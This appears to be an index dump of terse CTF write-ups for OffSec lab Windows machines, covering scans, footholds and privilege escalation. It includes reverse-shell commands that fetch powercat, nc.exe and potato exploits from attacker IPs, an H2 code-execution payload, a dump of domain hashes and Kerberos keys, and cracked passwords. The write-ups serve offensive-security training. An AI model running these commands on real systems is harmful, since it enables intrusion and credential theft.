\u0026#34;C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe\u0026#34; -Force now if we shutdown /r /t 0 we shud get a shell in sometime\ncvdf\n","date":"1 April 2026","externalUrl":null,"permalink":"/ctf-writeups/hepet/","section":"CTF Writeups","summary":"","title":"Hepet","type":"ctf-writeups"},{"content":"","date":"30 March 2026","externalUrl":null,"permalink":"/tags/easy/","section":"Tags","summary":"","title":"Easy","type":"tags"},{"content":" Kevin # Overview # OS: Windows IP: 192.168.139.45 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # easy RCE no privesc direct NT.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\ngot in with default creds\n","date":"30 March 2026","externalUrl":null,"permalink":"/ctf-writeups/kevin/","section":"CTF Writeups","summary":"","title":"Kevin","type":"ctf-writeups"},{"content":" Resourced # Overview # OS: Windows IP: 192.168.139.175 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # initial access w exposed creds privesc with RBCD.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # └─$ nmap -p- 192.168.139.175 -Pn -sCV -A --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-30 08:50 EDT Nmap scan report for 192.168.139.175 Host is up (0.081s latency). Not shown: 65515 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-30 12:50:59Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: resourced | NetBIOS_Domain_Name: resourced | NetBIOS_Computer_Name: RESOURCEDC | DNS_Domain_Name: resourced.local | DNS_Computer_Name: ResourceDC.resourced.local | DNS_Tree_Name: resourced.local | Product_Version: 10.0.17763 |_ System_Time: 2026-03-30T12:51:56+00:00 |_ssl-date: 2026-03-30T12:52:35+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=ResourceDC.resourced.local | Not valid before: 2026-03-29T12:49:54 |_Not valid after: 2026-09-28T12:49:54 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc Microsoft Windows RPC 49693/tcp open msrpc Microsoft Windows RPC 49708/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (92%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (92%), Microsoft Windows 10 1903 - 21H1 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows SMB # looks like we got some juice\nV.Ventz :: Hotelcalifornia194!\nfrom the password audit we were able to grab\nsecurity system ntds.dit ntds.jfm\nimpacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY local | tee dmp.txt [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94 [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b::: M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45::: K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c::: L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808::: J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726::: V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c::: S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939::: P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe::: R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac::: D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35::: G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2::: [*] Kerberos keys from ntds.dit Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8 Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2 Administrator:des-cbc-md5:80861f1a80f1232f RESOURCEDC$:aes256-cts-hmac-sha1-96:b97344a63d83f985698a420055aa8ab4194e3bef27b17a8f79c25d18a308b2a4 RESOURCEDC$:aes128-cts-hmac-sha1-96:27ea2c704e75c6d786cf7e8ca90e0a6a RESOURCEDC$:des-cbc-md5:ab089e317a161cc1 krbtgt:aes256-cts-hmac-sha1-96:12b5d40410eb374b6b839ba6b59382cfbe2f66bd2e238c18d4fb409f4a8ac7c5 krbtgt:aes128-cts-hmac-sha1-96:3165b2a56efb5730cfd34f2df472631a krbtgt:des-cbc-md5:f1b602194f3713f8 M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04 M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9 M.Mason:des-cbc-md5:268501b50e0bf47c K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115 K.Keen:des-cbc-md5:572cce13b38ce6da L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6 L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6 J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087 J.Johnson:des-cbc-md5:ea01d3d69d7c57f4 V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d V.Ventz:des-cbc-md5:4af77a3d1cf7c480 S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085 S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a S.Swanson:des-cbc-md5:5d37583eae1f2f34 P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230 P.Parker:des-cbc-md5:083b37079dcd764f R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef R.Robinson:des-cbc-md5:7051d568dfd0852f D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3 D.Durant:des-cbc-md5:376119bfcea815f8 G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91 G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7 G.Goldberg:des-cbc-md5:3e20fd1a25687673 Administrator password cracks Administrator:ItachiUchiha888\nlets get in\nDirbusting # Port 80 # Exploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nfrom the hashes we got earlier this one combo works\nevil-winrm -i $IP -u recourced.local\\\\L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 we follow my GenericAll RBCD procedure and get the flag\n","date":"30 March 2026","externalUrl":null,"permalink":"/ctf-writeups/resourced/","section":"CTF Writeups","summary":"","title":"Resourced","type":"ctf-writeups"},{"content":" Craft # Overview # OS: Windows IP: 192.168.222.169 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial with macro doc, priesc with lateral movement for better privs.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 04:26 EDT Nmap scan report for 192.168.222.169 Host is up (0.095s latency). Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7) |_http-title: Craft |_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (92%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (92%), Microsoft Windows 10 1903 - 21H1 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 80.75 ms 192.168.45.1 2 80.72 ms 192.168.45.254 3 80.77 ms 192.168.251.1 4 81.05 ms 192.168.222.169 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 29.67 seconds Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # lets follow this\nhttps://github.com/jotyGill/macro-generator\nLooks like its working so lets make it a revshell\nlets replace with this and run it\nShell(\u0026#34;cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString(\u0026#39;http://192.168.45.154/powercat.ps1\u0026#39;);powercat -c 192.168.45.154 -p 135 -e powershell\u0026#34;) we have write over this and we know that there is another user called apache lets laterally move\nwe have impersonate priv on this user\n","date":"29 March 2026","externalUrl":null,"permalink":"/ctf-writeups/craft/","section":"CTF Writeups","summary":"","title":"Craft","type":"ctf-writeups"},{"content":" Hutch # Overview # OS: Windows IP: 192.168.222.122 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # initial access thru creds leaked with —users ldap flag and then foothold with webdav cmdshell, privesc with exposed admin creds in laps.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server | http-webdav-scan: | WebDAV type: Unknown | Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK | Server Date: Sun, 29 Mar 2026 11:18:33 GMT | Server Type: Microsoft-IIS/10.0 |_ Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-29 11:17:39Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49676/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 49766/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (92%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (92%), Microsoft Windows 10 1903 - 21H1 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Dirbusting # LDAP # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Got Creds thru ldap as fmcsorley : CrabSharkJellyfish192\nand we have users so lets try roasting first and see if we get more\nASREP # well lets fall back and check our access, we have rn access to LDAP and smb with these new creds so lets enumerate them\nleave this we are able to cadaver with these creds, lets gen a payload to use\nwe put our webshell and ran this nice code i got from revshellgen\nlets escalate now\nQn;0$-v3+W47W6\n","date":"29 March 2026","externalUrl":null,"permalink":"/ctf-writeups/hutch/","section":"CTF Writeups","summary":"","title":"Hutch","type":"ctf-writeups"},{"content":" Internal # Overview # OS: Windows IP: 192.168.222.40 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # simple outdated samba.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Dirbusting # Port 80 # Exploitation # msfconsole search cve:CVE-2009-3103 use exploit/windows/smb/ms09_050_smb2_negotiate_func_index set RHOSTS set LHOST run\n","date":"29 March 2026","externalUrl":null,"permalink":"/ctf-writeups/internal/","section":"CTF Writeups","summary":"","title":"Internal","type":"ctf-writeups"},{"content":" Jacko # Overview # OS: Windows IP: 192.168.222.66 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for Jacko, including enumeration, exploitation, and privilege escalation.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # ORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: H2 Database Engine (redirect) | http-methods: |_ Potentially risky methods: TRACE 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 8082/tcp open http H2 database http console |_http-title: H2 Console 9092/tcp open XmlIpcRegSvc? 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port9092-TCP:V=7.95%I=7%D=3/29%Time=69C92986%P=x86_64-pc-linux-gnu%r(NU SF:LL,516,\u0026#34;\\0\\0\\0\\0\\0\\0\\0\\x05\\x009\\x000\\x001\\x001\\x007\\0\\0\\0F\\0R\\0e\\0m\\0o\\ SF:0t\\0e\\0\\x20\\0c\\0o\\0n\\0n\\0e\\0c\\0t\\0i\\0o\\0n\\0s\\0\\x20\\0t\\0o\\0\\x20\\0t\\0h\\0i SF:\\0s\\0\\x20\\0s\\0e\\0r\\0v\\0e\\0r\\0\\x20\\0a\\0r\\0e\\0\\x20\\0n\\0o\\0t\\0\\x20\\0a\\0l\\0 SF:l\\0o\\0w\\0e\\0d\\0,\\0\\x20\\0s\\0e\\0e\\0\\x20\\0-\\0t\\0c\\0p\\0A\\0l\\0l\\0o\\0w\\0O\\0t\\ SF:0h\\0e\\0r\\0s\\xff\\xff\\xff\\xff\\0\\x01`\\x05\\0\\0\\x024\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\ SF:.\\0j\\0d\\0b\\0c\\0\\.\\0J\\0d\\0b\\0c\\0S\\0Q\\0L\\0N\\0o\\0n\\0T\\0r\\0a\\0n\\0s\\0i\\0e\\0n SF:\\0t\\0C\\0o\\0n\\0n\\0e\\0c\\0t\\0i\\0o\\0n\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0:\\0\\x20\\0 SF:R\\0e\\0m\\0o\\0t\\0e\\0\\x20\\0c\\0o\\0n\\0n\\0e\\0c\\0t\\0i\\0o\\0n\\0s\\0\\x20\\0t\\0o\\0\\x SF:20\\0t\\0h\\0i\\0s\\0\\x20\\0s\\0e\\0r\\0v\\0e\\0r\\0\\x20\\0a\\0r\\0e\\0\\x20\\0n\\0o\\0t\\0\\ SF:x20\\0a\\0l\\0l\\0o\\0w\\0e\\0d\\0,\\0\\x20\\0s\\0e\\0e\\0\\x20\\0-\\0t\\0c\\0p\\0A\\0l\\0l\\0 SF:o\\0w\\0O\\0t\\0h\\0e\\0r\\0s\\0\\x20\\0\\[\\x009\\x000\\x001\\x001\\x007\\0-\\x001\\x009\\ SF:x009\\0\\]\\0\\r\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0 SF:a\\0g\\0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e\\0t\\0J\\0d\\0b\\0c\\0 SF:S\\0Q\\0L\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\(\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n SF:\\0\\.\\0j\\0a\\0v\\0a\\0:\\x006\\x001\\x007\\0\\)\\0\\r\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g SF:\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o SF:\\0n\\0\\.\\0g\\0e\\0t\\0J\\0d\\0b\\0c\\0S\\0Q\\0L\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\(\\0D SF:\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0:\\x004\\x002\\x007\\0\\)\\0\\ SF:r\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\. SF:\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e\\0t\\0\\(\\0D\\0b\\0E\\0x\\0c\\0e\\0p SF:\\0t\\0i\\0o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0:\\x002\\x000\\x005\\0\\)\\0\\r\\0\\n\\0\\t\\0a\\0t\\0\\ SF:x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\.\\0D\\0b\u0026#34;)%r(informi SF:x,516,\u0026#34;\\0\\0\\0\\0\\0\\0\\0\\x05\\x009\\x000\\x001\\x001\\x007\\0\\0\\0F\\0R\\0e\\0m\\0o\\0 SF:t\\0e\\0\\x20\\0c\\0o\\0n\\0n\\0e\\0c\\0t\\0i\\0o\\0n\\0s\\0\\x20\\0t\\0o\\0\\x20\\0t\\0h\\0i\\ SF:0s\\0\\x20\\0s\\0e\\0r\\0v\\0e\\0r\\0\\x20\\0a\\0r\\0e\\0\\x20\\0n\\0o\\0t\\0\\x20\\0a\\0l\\0l SF:\\0o\\0w\\0e\\0d\\0,\\0\\x20\\0s\\0e\\0e\\0\\x20\\0-\\0t\\0c\\0p\\0A\\0l\\0l\\0o\\0w\\0O\\0t\\0 SF:h\\0e\\0r\\0s\\xff\\xff\\xff\\xff\\0\\x01`\\x05\\0\\0\\x024\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\. SF:\\0j\\0d\\0b\\0c\\0\\.\\0J\\0d\\0b\\0c\\0S\\0Q\\0L\\0N\\0o\\0n\\0T\\0r\\0a\\0n\\0s\\0i\\0e\\0n\\ SF:0t\\0C\\0o\\0n\\0n\\0e\\0c\\0t\\0i\\0o\\0n\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0:\\0\\x20\\0R SF:\\0e\\0m\\0o\\0t\\0e\\0\\x20\\0c\\0o\\0n\\0n\\0e\\0c\\0t\\0i\\0o\\0n\\0s\\0\\x20\\0t\\0o\\0\\x2 SF:0\\0t\\0h\\0i\\0s\\0\\x20\\0s\\0e\\0r\\0v\\0e\\0r\\0\\x20\\0a\\0r\\0e\\0\\x20\\0n\\0o\\0t\\0\\x SF:20\\0a\\0l\\0l\\0o\\0w\\0e\\0d\\0,\\0\\x20\\0s\\0e\\0e\\0\\x20\\0-\\0t\\0c\\0p\\0A\\0l\\0l\\0o SF:\\0w\\0O\\0t\\0h\\0e\\0r\\0s\\0\\x20\\0\\[\\x009\\x000\\x001\\x001\\x007\\0-\\x001\\x009\\x SF:009\\0\\]\\0\\r\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a SF:\\0g\\0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e\\0t\\0J\\0d\\0b\\0c\\0S SF:\\0Q\\0L\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\(\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\ SF:0\\.\\0j\\0a\\0v\\0a\\0:\\x006\\x001\\x007\\0\\)\\0\\r\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\ SF:0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\ SF:0n\\0\\.\\0g\\0e\\0t\\0J\\0d\\0b\\0c\\0S\\0Q\\0L\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\(\\0D\\ SF:0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0:\\x004\\x002\\x007\\0\\)\\0\\r SF:\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\.\\ SF:0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e\\0t\\0\\(\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\ SF:0t\\0i\\0o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0:\\x002\\x000\\x005\\0\\)\\0\\r\\0\\n\\0\\t\\0a\\0t\\0\\x SF:20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\.\\0D\\0b\u0026#34;); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 4 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2026-03-29T13:33:42 |_ start_date: N/A TRACEROUTE (using port 8888/tcp) HOP RTT ADDRESS 1 81.28 ms 192.168.45.1 2 81.26 ms 192.168.45.254 3 81.89 ms 192.168.251.1 4 78.27 ms 192.168.222.66 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 203.70 seconds Dirbusting # Port 8082 # Exploitation # following this\nhttps://www.exploit-db.com/exploits/49384\nwe have Code exec\ncertutil -urlcache -split -f [http://192.168.45.159:80/nc.exe](http://192.168.45.159/nc.exe) C:/Users/Public/Documents/nc.exe md.exe /c C:/Users/Public/Documents/nc.exe -e cmd.exe 192.168.45.159 4444 CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR \u0026#34;JNIScriptEngine.eval\u0026#34;; CALL JNIScriptEngine_eval(\u0026#39;new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\u0026#34;certutil -urlcache -split -f http://192.168.45.159:80/GodPotato-NET4.exe C:/Users/Public/Documents/GodPotato.exe\u0026#34;).getInputStream()).useDelimiter(\u0026#34;\\\\Z\u0026#34;).next()\u0026#39;); ","date":"29 March 2026","externalUrl":null,"permalink":"/ctf-writeups/jacko/","section":"CTF Writeups","summary":"","title":"Jacko","type":"ctf-writeups"},{"content":" Authby # Overview # OS: Windows IP: 192.168.217.46 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE via FTP privesc with juicypotato.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # **21/tcp open ftp zFTPServer 6.0 build 2011-10-17** | ftp-anon: Anonymous FTP login allowed (FTP code 230) | total 9680 | ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe | ---------- 1 root root 25 Feb 10 2011 UninstallService.bat | ---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe | ---------- 1 root root 17 Aug 13 2011 StopService.bat | ---------- 1 root root 18 Aug 13 2011 StartService.bat | ---------- 1 root root 8736 Nov 09 2011 Settings.ini | dr-xr-xr-x 1 root root 512 Mar 28 23:38 log | ---------- 1 root root 2275 Aug 08 2011 LICENSE.htm | ---------- 1 root root 23 Feb 10 2011 InstallService.bat | dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions | dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates |_dr-xr-xr-x 1 root root 512 Oct 11 00:16 accounts 242/tcp open http Apache httpd 2.2.21 ((Win32) PHP/5.3.8) |_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8 | http-auth: | HTTP/1.1 401 Authorization Required\\x0D |_ Basic realm=Qui e nuce nuculeum esse volt, frangit nucem! |_http-title: 401 Authorization Required 3145/tcp open zftp-admin zFTPServer admin 3389/tcp open ms-wbt-server Microsoft Terminal Service |_ssl-date: 2026-03-28T16:39:18+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: LIVDA | NetBIOS_Domain_Name: LIVDA | NetBIOS_Computer_Name: LIVDA | DNS_Domain_Name: LIVDA | DNS_Computer_Name: LIVDA | Product_Version: 6.0.6001 |_ System_Time: 2026-03-28T16:39:13+00:00 | ssl-cert: Subject: commonName=LIVDA | Not valid before: 2025-10-09T17:16:18 |_Not valid after: 2026-04-10T17:16:18 FTP # we couldnt grab anything but we found 2 users admin and offsec and are able to get in w the creds admin admin\nwe have write perms so lets upload a php rev shell nd browse it\nDirbusting # Port 242 # I validated this step using the evidence below before moving forward in the chain.\nExploitation # on visiting the reverseshell after putting it into the ftp serv as admin we have our connection\nsysteminfo tells us our machine is x86 which is 32bit\nand because we have the selfimpersonate priv we can go ahead and use juicypotato\ncertutil -urlcache -split -f http://192.168.45.154/Juicy.Potato.x86.exe the default CLSID didnt work\n.\\Juicy.Potato.x86.exe -l 1360 -p c:\\windows\\system32\\cmd.exe -a \u0026#34;/c whoami\u0026#34; -t * ","date":"28 March 2026","externalUrl":null,"permalink":"/ctf-writeups/authby/","section":"CTF Writeups","summary":"","title":"Authby","type":"ctf-writeups"},{"content":" Algernon # Overview # OS: Windows IP: 192.168.143.58 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # easy RCE as NT.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap 